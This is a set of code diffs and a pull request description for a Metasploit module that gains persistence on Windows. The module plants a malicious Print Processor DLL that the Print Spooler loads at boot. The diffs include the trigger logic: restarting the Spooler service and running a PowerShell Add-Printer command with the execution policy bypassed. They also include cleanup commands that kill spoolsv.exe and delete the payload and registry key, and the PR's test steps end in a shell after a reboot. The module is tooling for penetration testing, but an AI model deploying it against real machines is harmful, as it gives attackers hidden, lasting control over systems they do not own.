+      if service_restart('Spooler')
+        print_good('Spooler service restarted successfully')
+      else
+        print_warning('Unable to cleanly restart Spooler service automatically.')
+      end
+    end
 
     @clean_up_rc << "execute -f cmd.exe -a '/c net stop spooler' -i -H\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"
     @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c net start spooler' -H\n"
-  end
-
-  def restart_spooler
-    print_status('Attempting to restart Spooler service for immediate payload trigger...')
-    stop_result = service_stop('Spooler')
-    start_result = service_start('Spooler')
-
-    if stop_result.zero? && start_result.zero?
-      print_good('Spooler service restarted successfully')
-    else
-      print_warning("Unable to restart Spooler cleanly (stop=#{stop_result}, start=#{start_result}).")
-    end
-  rescue Rex::Post::Meterpreter::RequestError, NoMethodError => e
-    print_warning("Failed to restart Spooler service automatically: #{e.class} #{e}")
   end
 end

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -113,11 +113,21 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_status('Attempting to restart Spooler service for immediate payload trigger...')
       if service_restart('Spooler')
         print_good('Spooler service restarted successfully')
+
+        print_status('Executing Add-Printer command...')
+        printer_name = Rex::Text.rand_text_alpha(8)
+        create_process('powershell', args: [
+          '-NoProfile',
+          '-ExecutionPolicy', 'Bypass',
+          '-Command',
+          "Add-Printer -Name '#{printer_name}' -PortName 'FILE:' -DriverName 'Microsoft Print To PDF' -PrintProcessor '#{processor_name}'"
+        ], opts: { 'Channelized' => false })
       else
         print_warning('Unable to cleanly restart Spooler service automatically.')
       end
     end
 
+    @clean_up_rc << "execute -f cmd.exe -a '/c wmic printer where name=\"#{printer_name}\" delete' -H\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c net stop spooler' -i -H\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     return CheckCode::Unknown('Admin or SYSTEM privileges are required') unless is_system? || is_admin?
     return CheckCode::Unknown("Target directory #{target_dir} does not exist") unless directory?(target_dir)
+    return CheckCode::Unknown("#{target_dir} isn't writable") unless writable?(target_dir)
 
     spooler = service_info('Spooler')
     return CheckCode::Safe('Spooler service not found') if spooler.nil?

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def target_dir
-    base = 'C:\\Windows\\System32\\spool\\prtprocs'
+    base = session.sys.config.getenv('WINDIR') + '\\System32\\spool\\prtprocs'
     sysinfo['Architecture'] == ARCH_X64 ? "#{base}\\x64" : "#{base}\\w32x86"
   end
 


### PR DESCRIPTION
Adds a new persistence module that registers a malicious Print Processor DLL under the Print Spooler service registry key. The spooler loads the DLL at startup, providing persistence across reboots. Requires SYSTEM privileges.

Fixes #20827

## Verification

- [ ] Start `msfconsole`
- [ ] Get a SYSTEM shell 
- [ ] `use exploit/windows/persistence/print_processor`
- [ ] `set SESSION [SESSION]`
- [ ] `run`
- [ ] Reboot the machine 
- [ ] You should get a shell
